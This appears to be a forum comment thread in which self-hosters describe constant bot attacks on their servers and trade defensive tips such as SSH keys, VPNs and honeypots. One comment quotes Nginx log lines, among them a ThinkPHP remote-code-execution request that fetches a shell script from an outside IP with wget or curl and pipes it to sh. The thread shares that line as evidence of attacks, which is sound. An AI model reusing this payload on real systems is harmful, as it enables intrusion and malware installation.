The internet is no longer a safe haven

> The internet is no longer a safe haven for software hobbyists

Maybe I've just had bad luck, but since I started hosting my own websites back around 2005 or so, my servers have always been attacked basically from the moment they come online. Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs"). Once you start sharing your website, it again triggers an avalanche of bad traffic, and the final boss is when you piss of some organization and (I'm assuming) they hire some bad actor to try to make you offline.

Dealing with crawlers, bot nets, automation gone wrong, pissed of humans and so on have been almost a yearly thing for me since I started deploying stuff to the public internet. But again, maybe I've had bad luck? Hosted stuff across wide range of providers, and seems to happen across all of them.

My first ever deployed project was breached on day 1 with my database dropped and a ransom note in there. Was a beginner mistake by me that allowed this, but it's pretty discouraging. Its not the internet that sucks, its people that suck.

Well I guess at least on day 1 you didn’t have much to lose!

My stuff used to get popped daily. A janky PHP guestbook I wrote just to learn back in the early 2000s? No HTML injection protection & someone turned my site into spammy XSS hack within days. A WordPress installation I fell behind on patching? Turned into SEO spam in hours. A redis instance I was using just to learn some of their data structures that got accidentally exposed to the web? Used to root my computer and install a botnet RAT. This was all before 2020.

I never felt this made the internet "unsafe". Instead, it just reminded me how I messed up. Every time, I learned how to do better, and I added more guardrails. I haven't gotten popped that obviously in a long time, but that's probably because I've acted to minimize my public surface area, used star-certs to avoid being in the cert logs, added basic auth whenever I can, and generally refused to _trust_ software that's exposed to the web. It's not unsafe if you take precautions, have backups, and are careful about what you install.

If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it. Downloading any random driver or exe to fix a problem, installing apps when a website would do, giving Facebook or Tiktok all of their information and access without recognizing that just maybe these multi-billion-dollar companies who give away all of their services don't have your best interests in mind.

I really like how you take these situations and turn them into learning moments, but ultimately what you’re describing still sounds like an incredibly hostile space. Like yeah everyone should be a defensive driver on the road, but we still acknowledge that other people need to follow the rules instead of forcing us to be defensive drivers all the time.

Hosting a WP with any amount of by script kiddies written third-party plugins without constant vigilance and keeping things up to date is a recipe for disaster. This makes it a job guarantee. Hapless people paying for someone to set up a hopelessly over-complicated WP setup, paying for lots of plugins, and constant upkeep. Basically, that ecosystem feeds an entire community of "web developers" by pushing badly written software, that then endlessly needs to be patched and maintained. Then the feature creep sets in and plugins stray from the path of doing one thing well, until even WP instance maintainers deem them too bloated and look for a simpler one. Then the cycle begins anew.

Its a personal blog so even if data was lost it would've been just posts that nobody reads. Certainly not worth the 0.00054 BTC they wanted

> my servers have always been attacked

I believe the correct verb is monetised.

I have very similar experience. In my Nginx logs, I see things like that on a regular basis:

79.124.40.174 - - [16/Nov/2025:17:04:52 +0000] "GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1" 404 555 "http://142.93.104.181:80/?XDEBUG_SESSION_START=phpstorm" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" ... 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\xF7:\xB4]D\x0C\xD0?\xEF~\xAC\xF8\x8C\x80us\xB8=\x0F\x9C\xA8\xC1\xDD\xC4\xDF2\x8CQC\x18\xDC\x1D \xD0{\xC9\x01\xEC\x227\xCB9\xBE\x8C\xE0\xB2\x9F\xCF\x97\xF6\xBE\x88z/\xD7;\xB1\x8C\xEEu\x00\xBF]<\x92\x00" 400 157 "-" "-" "-" 145.220.0.84 - - [16/Nov/2025:15:00:21 +0000] "\x16\x03\x01\x00\xCE\x01\x00\x00\xCA\x03\x03\x8A\xB5\xA4)n\x10\x8CO(\x99u\xD8\x13\x0B\xB7h7\x16\xC5[\x85<\xD3\xDC\x9C\xAB\x89\xE0\x0B\x08a\xDE \x9F2Z\xCD\xD1=\x9B\xBAU1\xF3h\xC1\xEEY<\xAEuZ~2\x81Cg\xFD\x87\x84\xA3\xBA:$\xC8\x00" 400 157 "-" "-" "-"

or:

"192.159.99.95 - - [16/Nov/2025:13:44:03 +0000] "GET /public/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=%28wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Cbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%7C%7Ccurl%20-s%20http%3A%2F%2F74.194.191.52%2Frondo.txg.sh%29%7Csh HTTP/1.1" 301 169 "-" "Mozilla/5.0 (bang2013@atomicmail.io)" "-"

These are just some examples, but they happen pretty much daily :(

I remember watching the code red signatures in my space logs on my desktop back in 2001

I have a personal domain that I have no reason to believe any other human visits. I selfhost a few services that only I use but that I expose to the internet so I can access them from anywhere conveniently and without having to expose my home network. Still I get a constant torrent of malicious traffic, just bots trying to exploit known vulnerabilities (loads of them are clearly targeting WordPress, for example, even though I have never used WordPress). And it has been that way for years. I remember the first time I read my access logs I had a heart attack, but it's just the way it is.

The public internet is a incredibly hostile infosec environment and you pretty much HAVE to block requests based on real time threat data like https://www.misp-project.org/feeds/

It is fun to create honeypots for things like SSH and RDP and automatically block the source IPs

and it has been that way for a long time. Hosting a service on the internet means some one is *constantly* knocking at your door. It would be unimaginable if every few 10-1000s of milliseconds someone was trying a key in my front door, but that's just what it is with an open port on the internet.

more like a zero day on day zero.

I recently provisioned a VPS for educational purposes. As part of teaching public/private network interfaces in Docker, and as a debug tool, I run netstat pretty easily on.

Minutes after coming into existence, I have half a dozen connections to sshd from Chinese IP addresses.

That teaches the use of SSH keys.

The Internet is not safe, and Let's Encrypt shows us this. They're a great service, but the moment you put something on the Internet and then give it a SSL/TLS certificate, evil will hammer your site to trying to find a WordPress admin page.

The worst feeling I ever had was from exposing a samba share to the Internet in the 2000s and having that get popped and my dad’s company getting hacked because of the service I set up for him.

I’ve often thought about writing a script to use those bot attacks as a bit of a honey pot. The idea would be if someone is viewing a site with a brand new SSL certificate, that it can’t be legitimate traffic, so just block that ip/subnet outright at the firewall. Especially if they are looking for specific URLs like Wordpress installations. There are a few good actors that also hit sites quickly (ex: I’ve seen Bing indexing in that first wave of hits), but those are the exception.

Sadly, like many people, I just deal with the traffic as opposed to getting around to actually writing a tool to block it.

For your use case have you thought about VPN into your local network, via e.g. a Synology box? It's pretty cool and easy to set up.

I can confirm.

My then PageRank 6 Business Website got attacked non stop starting around the 2008.

At this time my log files exploded as well: the Script Kiddies entered the arena.

At the time the first tools leaked into the public to scan for IP ranges and check websites for certain attack vectors.

I miss the era between Compuserve, AOL around 1995 till 2008.

Web Rings, Technorati, fantastic Fan Sites before Wikipedia - wholesome.

Term: Script Kiddies https://en.wikipedia.org/wiki/Script_kiddie

Just put sshd on a nonstandard port, and 95% of the traffic goes away. Vandals can't be bothered with port-scanning, probably because the risk of getting banned before the scan is even complete is too high.

But I agree that keys are not optional anymore.

You'd end up blocking a bunch of cloud provider IP ranges and one day in the near future, there's a good chance some SaaS or provider service doesn't work.

Fronting with ssh is not as secure as you could be.

Wireguard, tailscale, etc instead, THEN use ssh keys (with password on them mind you, then you have 2fa - something you have, and something you know).

By 1995 most of the script kiddies I knew were also co-mingling with 0day authors and warez distributors.

It's "not unsafe" if you take dozens of ever changing and hard to learn precautions and also get lucky that new exploits and your exposed services don't overlap? That's the internet being very unsafe.

> If you want to see unsafe, look at how someone who doesn't understand tech tries to interact with it.

Personal actions (and their safety) are a different category from environments (and their safety).

This sounds like a great use-case for VPN or Tailscale? Access from anywhere, uses the open-internet as a carriage service but exposes no endpoints on the open internet. Is there a particular requirement that makes that non-viable?

To entertain the few humans behind this, I run what I call "HTTP Adventure" on well-known admin addresses.

E.g., https://www.masswerk.at/wp-admin

Maybe I don't monitor my side projects/personal servers enough, but I've never noticed anything of the sort.

I mean, I do see crawler and bot traffic, but nothing that warrants taking action.

Yeah, was it ever safe or is this nostalgia? The few times I've managed servers directly I'd get hit a few hundred times per day in a number of obvious, non-existent URLs or existing URLs but with invalid payloads. Using Cloudflare to block entire countries helped a little bit.

"Even more so when you attach any sort of DNS name to it, especially when you use TLS and the certificates, guessing because they end up in a big index that is easily accessible (the "transparency logs")."

I have accessed websites that do not use ICANN DNS nor TLS, sometimes on ports other than common ones like 80, 443, etc.

The term "website" to me means an IP address from which an operator publishes hypertext (HTML) and responds to HTTP requests

But others might define "website" differently

On home network for experimentation I create own TLDs in custom root.zone and use non-TLS per packet encryption to serve HTML over UDP instead of TCP

The blog post refers to "safe haven"

Usually "safe haven" means there is something that one is seeking protection from

It is not clear from the blog post what the author believes "the internet" was previously a safe haven from

Not to mention the www != the internet

It's possible the broader internet, including many "unused" ports between 0-65536, could be a "safe haven" from the web what with "AI bots"

I am vaguely aware of such solutions and I think there's no real reason why they wouldn't work. I think I just wasn't familiar with them at the time I set up the VPS. (Also I assume they would require an always-on box at home, which at the time I didn't have, and even now I suspect a VPS would provide more reliable uptime.)

I do use non-standard ports and sshd on VPC/VPN interfaces. But for teaching purposes, you are dealt a hand and you have to learn to deal with it.